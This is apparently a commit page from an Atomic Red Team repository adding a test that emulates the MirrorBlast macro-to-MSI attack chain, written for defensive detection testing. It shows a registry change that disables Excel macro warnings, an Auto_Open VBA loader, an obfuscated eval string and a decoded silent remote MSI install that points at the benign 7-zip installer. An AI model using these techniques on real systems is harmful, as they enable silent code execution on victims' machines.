adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1204.002 Added Test to Emulate Mirror Blast TA505 (#2180)

Browse Source 
* Update T1204.002.yaml

Added Mirror Blast technique.

* Update T1204.002.yaml

Added cleanup command to Mirror Blast Test.

* Add files via upload

Added Excel sheet with macro to download 7zip.

* Add files via upload

Information about macro in Mirror Blast.

* use PathToAtomicsFolder

* add link to blog

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
CDub1016
2022-10-12 14:53:10 -05:00
committed by GitHub
parent cc0f4485ca
commit 3bff37d737
3 changed files with 26 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1204.002/T1204.002.yaml
+14
View File
@@ -408,3 +408,17 @@ atomic_tests:
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
name: powershell
- name: Mirror Blast Emulation
description: |
Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed.
Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies)
supported_platforms:
- windows
executor:
command: |-
Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
& '.\Excel 2016.lnk' PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm
cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f
name: powershell
atomics/T1204.002/bin/mirrorblast_emulation.xlsm
BIN
View File
Binary file not shown.
atomics/T1204.002/src/Mirror Blast.txt
+12
View File
@@ -0,0 +1,12 @@
The file that was added to binary is the excel spreadsheet that has the macro to download 7zip.
VBA code (in auto_open excel module)
Sub Auto_Open() With CreateObject("ScriptControl") .Language = "JScript" .AddCode (Range("A1").Value) End With EndSub
---------------------
Encoded JS Command:
eval('}kk)kk"kkikkskkmkk.kk4kk6kkxkk-kk7kk0kk1kk2kkzkk7kk/kkakk/kkgkkrkkokk.kkpkkikkzkk-kk7kk.kkwkkwkkwkk/kk/kk:kkskkpkktkktkkhkk"kk(kktkkckkukkdkkokkrkkPkklkklkkakktkkskknkkIkk;kk1kk=kklkkekkvkkekkLkkIkkUkk{kk)kk)kk"kkrkkekklkklkkakktkkskknkkIkk.kkrkkekklkklkkakktkkskknkkIkkskkwkkokkdkknkkikkWkk"kk(kktkkckkekkjkkbkkOkkXkkekkvkkikktkkckkAkk kkwkkekknkk(kkhkktkkikkw'.split('kk').reverse().join(''))
--------------------
Decoded JS Command:
with(new ActiveXObject("WindowsInstaller.Installer")){UILevel=1;InstallProduct("https://www.7-zip.org/a/7z2107-x64.msi")}